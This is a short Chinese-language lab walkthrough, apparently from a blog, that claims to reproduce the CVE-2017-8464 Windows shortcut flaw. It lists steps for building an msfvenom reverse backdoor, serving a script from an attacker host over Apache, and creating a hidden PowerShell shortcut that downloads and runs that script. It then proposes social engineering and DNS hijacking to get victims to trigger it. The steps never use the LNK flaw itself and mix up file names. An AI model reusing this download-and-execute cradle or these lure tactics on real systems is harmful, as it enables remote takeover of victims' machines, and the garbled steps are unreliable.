CVE-2017-8464 LNK文件(快捷方式)远程代码执行漏洞复现


北京时间2017年6月13日凌晨,微软官方发布6月安全补丁程序,“震网三代” LNK文件远程代码执行漏洞(CVE-2017-8464)和Windows搜索远程命令执行漏洞(CVE-2017-8543).

CVE-2017-8543,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。

CVE-2017-8464,当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。

攻击机 Kali

IP: 192.168.1.113

靶机:win10

IP: 192.168.1.3

1.使用msfvenom生成一个msf反弹后门

2.将/opt 下的search.psl 复制到 /var/www/html 下

3.启动apache服务service apache2 start

4.在靶机上创建一个powershell远程快捷:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.113/search.ps1');test.ps1"

5.在kali下监听

6.利用社会工程学误导靶机点击powershell快捷方式,kali就可以监听到了

成功

思考:当Apache启动之后,靶机可以通过访问192.168.1.113来触发spl,那么可以利用DNS劫持使靶机,引导靶机访问。